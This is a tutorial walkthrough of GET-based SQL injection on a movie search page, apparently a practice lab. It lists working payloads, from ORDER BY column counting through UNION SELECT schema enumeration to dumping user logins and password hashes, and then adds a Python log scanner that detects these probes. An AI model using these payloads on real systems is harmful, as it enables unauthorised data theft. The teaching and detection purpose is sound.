SQL Injection (Search\GET)

A SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system and in some cases issue commands to the operating system. SQL injection attacks are a type of injection attack, in which SQL commands are injected into data-plane input in order to effect the execution of predefined SQL commands.


Take an example like this one: a page where we can search for movies by title.
Let's check for SQLi with a single quote (').
We got an error, so let's proceed further.
With two single quotes and a space between them (' '):
All the movie results are now shown without searching for any specific movie in the database.
Now use ORDER BY to find the exact number of columns in the query.
For that we put (1' order by 1-- -) after title= and increase the column number until we get an error.
title=1' order by 1-- -
title=1' order by 2-- -
title=1' order by 3-- -
title=1' order by 4-- -
title=1' order by 5-- -
title=1' order by 6-- -
title=1' order by 7-- -
At 8 we got an error, which means the query has 7 columns. Now move to the next step,
which is enumerating the database using UNION SELECT.
The columns whose values are printed on the page are 2, 3, 5 and 4 respectively.
Let's choose column 2:
title=1' union select 1,database(),3,4,5,6,7-- -
Now extract the table names from the database:
title=1' union select 1,table_name,3,4,5,6,7 from information_schema.tables where table_schema=database()-- -
title=1' union select 1,group_concat(table_name),3,4,5,6,7 from information_schema.tables where table_schema=database()-- -
Now let's check the users table:
title=1' union select 1,group_concat(column_name),3,4,5,6,7 from information_schema.columns where table_name="users"-- -
title=1' union select 1,group_concat(login,0x3a,password),3,4,5,6,7 from users-- -
As you can see, we successfully dumped the usernames and password hashes from the database.
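The probing sequence above leaves a clear trail in the web server's access log. The following Python script is an added example (not part of the original walkthrough): it decodes each GET query parameter and flags the comment sequence, ORDER BY column counting, UNION SELECT and information_schema patterns used in the steps above. The log lines and the /search.php path are constructed samples.

```python
"""Flag GET requests whose decoded query parameters carry SQLi probes:
comment sequences, ORDER BY counting, UNION SELECT, information_schema."""
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# One pattern per stage of the attack progression shown in the walkthrough.
PATTERNS = {
    "sql_comment": re.compile(r"--\s|/\*"),
    "order_by_probe": re.compile(r"\border\s+by\s+\d+", re.I),
    "union_select": re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    "schema_enum": re.compile(r"information_schema\.(tables|columns)", re.I),
    "group_concat": re.compile(r"\bgroup_concat\s*\(", re.I),
}
# Request line inside a Combined Log Format entry, e.g. "GET /p?q=1 HTTP/1.1"
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

def inspect_request(target):
    """Return the names of all patterns matched by any query parameter value."""
    hits = set()
    params = parse_qs(urlsplit(target).query, keep_blank_values=True)
    for values in params.values():
        for value in values:
            # parse_qs decoded once; a second pass catches double-encoded %2527
            decoded = unquote_plus(value)
            for name, pattern in PATTERNS.items():
                if pattern.search(decoded):
                    hits.add(name)
    return hits

def scan_log(lines):
    """Return (line_number, sorted_hits) for every GET request with a finding."""
    findings = []
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if match and match.group("method") == "GET":
            hits = inspect_request(match.group("target"))
            if hits:
                findings.append((number, sorted(hits)))
    return findings

SAMPLE_LOG = [  # constructed sample entries; /search.php is a placeholder path
    '10.0.0.5 - - [01/Jan/2024:12:00:00 +0000] "GET /search.php?title=iron+man&action=search HTTP/1.1" 200 1543',
    '10.0.0.5 - - [01/Jan/2024:12:00:05 +0000] "GET /search.php?title=1%27+order+by+8--+-&action=search HTTP/1.1" 200 812',
    '10.0.0.5 - - [01/Jan/2024:12:00:09 +0000] "GET /search.php?title=1%27+union+select+1,group_concat(table_name),3,4,5,6,7+from+information_schema.tables+where+table_schema=database()--+-&action=search HTTP/1.1" 200 2210',
    '10.0.0.6 - - [01/Jan/2024:12:01:00 +0000] "GET /search.php?title=order+by+the+book&action=search HTTP/1.1" 200 1402',
]

if __name__ == "__main__":
    for number, hits in scan_log(SAMPLE_LOG):
        print(f"line {number}: {', '.join(hits)}")
```

The fourth sample line shows why the ORDER BY pattern requires a trailing number: a legitimate title containing the words "order by" is not flagged.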

~ Hack the World and Stay Noob
